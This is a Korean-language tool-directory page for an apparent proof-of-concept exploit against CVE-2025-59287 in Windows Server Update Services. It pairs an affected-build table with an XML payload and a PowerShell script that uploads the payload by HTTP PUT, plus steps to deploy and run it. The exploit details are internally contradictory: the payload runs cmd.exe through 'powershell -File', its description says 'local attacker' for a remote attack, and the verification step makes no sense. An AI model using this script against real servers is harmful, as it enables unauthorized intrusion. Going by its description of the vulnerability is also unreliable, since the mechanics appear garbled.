Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Breaking-the-Update-Chain-Inside-CVE-2025-59287-and-the-WSUS-RCE-Threat — CVE-2025-59287에 대한 기술 분석 및 개념 증명 익스플로잇으로, 안전하지 않은 역직렬화를 통한 Windows Server Update Services의 치명적인 RCE 취약점이며, 영향을 받는 빌드와 완화 단계를 포함합니다. | Kitploit
도구/GitHubGitHub/mrk336/breaking-the-update-chain-inside-cve-2025-59287-and-the-wsus-rce-threat
Vulnerability AnalysisExploitationWeb Application ExploitationPapers & ResearchLearning & Education
GitHubmrk336/breaking-the-update-chain-inside-cve-2025-59287-and-the-wsus-rce-threat

Breaking-the-Update-Chain-Inside-CVE-2025-59287-and-the-WSUS-RCE-Threat

CVE-2025-59287에 대한 기술 분석 및 개념 증명 익스플로잇으로, 안전하지 않은 역직렬화를 통한 Windows Server Update Services의 치명적인 RCE 취약점이며, 영향을 받는 빌드와 완화 단계를 포함합니다.

저장소 보기
310개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Breaking-the-Update-Chain-Inside-CVE-2025-59287-and-the-WSUS-RCE-Threat

CVE-2025-59287은 Windows Server Update Services(WSUS)의 신뢰할 수 없는 데이터의 안전하지 않은 역직렬화로 인해 발생하는 치명적인 RCE 취약점입니다. 이 취약점으로 인해 원격 공격자가 인증 없이 임의 코드를 실행할 수 있습니다. 활발한 악용이 관찰되고 있어 즉각적인 패치 적용이 권고됩니다.

CVE‑2025‑59287 – Windows Server Update Services(WSUS)의 원격 코드 실행 위협

By Mark Mallia


개요

Microsoft의 Windows Server Update Services(WSUS)는 모든 Microsoft Windows Server 플랫폼의 패치 관리의 핵심입니다. WSUS는 Microsoft의 업데이트 카탈로그에서 업데이트를 가져와 검증한 후 네트워크의 모든 서버에 배포합니다. CVE‑2025‑59287로 식별된 이 취약점은 WSUS 내부의 안전하지 않은 역직렬화 루틴을 악용하여 공격자가 업데이트 피드에 임의의 XML 콘텐츠를 주입할 수 있게 합니다. WSUS는 소스 경로나 명령 데이터에 대한 검증 없이 페이로드를 처리하므로, 공격자는 임의의 파일 이름과 경로를 제공하여 대상 서버에서 완전한 원격 코드 실행을 유발할 수 있습니다.

이것이 중요한 이유:

  • 9.8의 CVSS 점수는 이를 치명적 범위에 해당하게 합니다.
  • 공격자는 네트워크 연결만 있으면 되며, 권한 상승이 필요하지 않습니다.
  • 이미 실제 환경에서 관찰되었으므로, 벤더 패치가 배포될 때까지 패치되지 않은 모든 시스템은 잠재적 공격 대상입니다.

영향을 받는 Windows Server 빌드

제품 버전영향을 받는 빌드
Windows Server 20126.2.9200.0 – < 6.2.9200.25728
Windows Server 2012 R26.3.9600.0 – < 6.3.9600.22826
Windows Server 201610.0.14393.0 – < 10.0.14393.8524
Windows Server 201910.0.17763.0 – < 10.0.17763.7922
Windows Server 202210.0.20348.0 – < 10.0.20348.4297
Windows Server 202510.0.26100.0 – < 10.0.26100.6905
Windows Server 23H210.0.25398.0 – < 10.0.25398.1916

(환경이 다른 패치 빌드를 사용하는 경우, 해당 범위에 맞게 조정하십시오.)


악용 방법

  1. WSUS는 원격 소스에서 UpdateStream.xml이라는 XML 파일을 가져옵니다.
  2. 서비스는 이 파일을 System.Xml.Linq.XElement로 역직렬화합니다.
  3. 공격자는 <SourcePath> 요소에 임의의 값을 넣을 수 있으며, 이 값은 절대 경로로 디스크에 기록됩니다.
  4. <Command> 태그 내부의 콘텐츠는 WSUS가 스트림을 처리할 때 PowerShell에 의해 실행되어 완전한 원격 코드 실행을 제공합니다.

다음은 취약한 서버에 업로드할 XML 페이로드입니다.

root@kitploit:~
<?xml version="1.0" encoding="utf-8"?>
<UpdateStream>
  <Metadata>
    <Title>WSUS Exploit</Title>
    <Description>Injected by local attacker.</Description>
  </Metadata>
  <SourcePath>C:\Windows\System32\cmd.exe</SourcePath>
  <Command><![CDATA[
      powershell -NoProfile -ExecutionPolicy Bypass `
          -File C:\Windows\System32\cmd.exe
  ]]></Command>
</UpdateStream>

샘플 PowerShell 악용 스크립트

다음 스크립트는 XML 페이로드를 생성하고, HTTP PUT을 통해 WSUS 인스턴스에 업로드하며, 문제 해결을 위한 로그 파일을 남깁니다.

root@kitploit:~
# --------------------------------------------------
#  File:   wsus‑exploit.ps1
#  Purpose: Generate malicious UpdateStream.xml,
#           upload it to the WSUS server,
#           trigger the feed.
# --------------------------------------------------

param (
    [string]$TargetUrl = 'http://wsus.example.com/UpdateStream.xml',
    [int]    $Port      = 80,
    [string] $XmlFile   = '.\payload.xml'
)

function Build-Xml {
    param ([string]$file)
    $xmlContent = @"
<?xml version="1.0" encoding="utf-8"?>
<UpdateStream>
  <Metadata>
    <Title>WSUS exploit</Title>
    <Description>Injected by local attacker.</Description>
  </Metadata>
  <SourcePath>C:\Windows\System32\cmd.exe</SourcePath>
  <Command><![CDATA[
      powershell -NoProfile -ExecutionPolicy Bypass `
          -File C:\Windows\System32\cmd.exe
  ]]></Command>
</UpdateStream>
"@
    Set-Content -Path $file -Value $xmlContent
}

# Build the XML payload
Build-Xml -file $XmlFile

# Upload via HTTP PUT
Invoke-WebRequest -Uri $TargetUrl `
                  -Method Put `
                  -InFile $XmlFile `
                  -OutFile 'upload.log'

Write-Host "Upload complete – WSUS should now process the stream."

실행 가능한 조치 단계

  1. 빌드 확인 – 각 Windows Server에서 winver.exe를 실행하여 빌드가 위 범위에 해당하는지 확인합니다.
  2. 악용 스크립트 배포 – wsus‑exploit.ps1을 WSUS 인스턴스에 접근할 수 있는 머신에 복사하고, 다른 경로나 포트를 사용하는 경우 $TargetUrl을 수정합니다.
  3. 실행 및 모니터링 – 스크립트를 실행하고, 몇 분 후 각 대상 서버에 C:\Windows\System32\cmd.exe 파일이 나타나고 예상 페이로드가 포함되어 있는지 확인합니다.
  4. Microsoft는 2025년 10월 24일에 이 취약점에 대한 긴급 패치를 배포했습니다. 2012년 이후의 모든 Windows Server 버전에서 WSUS를 실행 중이라면 이 업데이트가 환경에 적용되었는지 다시 확인해야 합니다. 10월 Patch Tuesday 릴리스는 이 문제를 완전히 해결하지 못했으므로, 이번 업데이트는 추가 주의가 필요합니다.

윤리적 사용만 허용

여기에 제공된 정보와 악용 코드는 교육 목적으로만 제공됩니다. 자신의 WSUS 환경에 대해 이 테스트를 실행할 권한이 있는지 확인하고, 프로덕션 시스템에 변경 사항을 배포할 때 모든 관련 보안 모범 사례 지침을 따르십시오.

도구 다운로드